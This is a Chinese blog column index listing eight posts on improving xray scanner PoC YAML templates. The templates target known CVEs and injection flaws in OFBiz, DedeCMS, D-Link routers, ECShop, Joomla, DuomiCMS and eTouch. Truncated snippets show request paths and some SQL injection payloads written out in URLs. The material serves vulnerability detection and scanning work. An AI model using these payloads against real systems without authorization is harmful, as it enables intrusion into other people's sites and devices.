![](https://img-blog.csdnimg.cn/6dcd2d59f0694a2fa6569c35b387acfc.jpeg?x-oss-process=image/resize,m_fixed,h_224,w_224)
Xray插件
Xray插件切入Web自动化攻击
_HWHXY
Sec For All All For Sec
展开
-
xray插件改良1-poc-yaml-ofbiz-cve-2020-9496
xray插件改良1-ofbiz-cve-2020-9496前言poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization原始的ymlhttps://github.com/chaitin/xray/blob/master/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.ymlname: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization原创 2021-03-21 23:42:09 · 520 阅读 · 0 评论 -
xray插件改良2-poc-yaml-dedecms-cve-2018-6910
xray插件改良2-poc-yaml-dedecms-cve-2018-6910前言poc-yaml-dedecms-cve-2018-6910原始的ymldedecms-cve-2018-6910.ymlname: poc-yaml-dedecms-cve-2018-6910rules: - method: GET path: /include/downmix.inc.php expression: | response.status == 200 &&a原创 2021-03-23 13:39:24 · 1294 阅读 · 0 评论 -
xray插件改良3-poc-yaml-dlink-850l-info-leak
xray插件改良3-poc-yaml-dlink-850l-info-leak前言poc-yaml-dlink-850l-info-leak原始的ymlpoc-yaml-dlink-850l-info-leakname: poc-yaml-dlink-850l-info-leakrules: - method: POST path: /hedwig.cgi headers: Content-Type: text/xml Cookie: uid=R8tBj原创 2021-03-23 15:23:23 · 1083 阅读 · 0 评论 -
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce
xray插件改良4-poc-yaml-dlink-dsl-2888a-rce前言poc-yaml-dlink-dsl-2888a-rce原始的ymlpoc-yaml-dlink-dsl-2888a-rcename: poc-yaml-dlink-dsl-2888a-rcerules: - method: GET path: /page/login/login.html follow_redirects: false expression: | respons原创 2021-03-23 16:01:24 · 442 阅读 · 0 评论 -
xray插件改良6-poc-yaml-ecshop-360-rce
xray插件改良6-poc-yaml-ecshop-360-rce前言原始ymlname: poc-yaml-ecshop-360-rceset: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800)rules: - method: POST path: /user.php headers: Referer: >- 45ea207d7a2b68c49582d2d22adf953a原创 2021-03-23 23:58:56 · 582 阅读 · 0 评论 -
xray插件改良8-poc-yaml-joomla-component-vreview-sql
xray插件改良8-poc-yaml-joomla-component-vreview-sql前言原始ymlname: poc-yaml-joomla-component-vreview-sqlset: r1: randomInt(800000000, 1000000000)rules: - method: POST path: /index.php?option=com_vreview&task=displayReply headers: Conten原创 2021-03-25 19:11:28 · 324 阅读 · 0 评论 -
xray插件改良5-poc-yaml-duomicms-sqli
xray插件改良5-poc-yaml-duomicms-sqli前言poc-yaml-duomicms-sqli原始的ymlpoc-yaml-duomicms-sqliname: poc-yaml-duomicms-sqlirules: - method: GET path: >- /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(20原创 2021-03-23 19:28:34 · 574 阅读 · 0 评论 -
xray插件改良7-poc-yaml-etouch-v2-sqli
xray插件改良7-poc-yaml-etouch-v2-sqli前言原始ymlname: poc-yaml-etouch-v2-sqlirules: - method: GET path: >- /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e原创 2021-03-24 11:40:59 · 1176 阅读 · 1 评论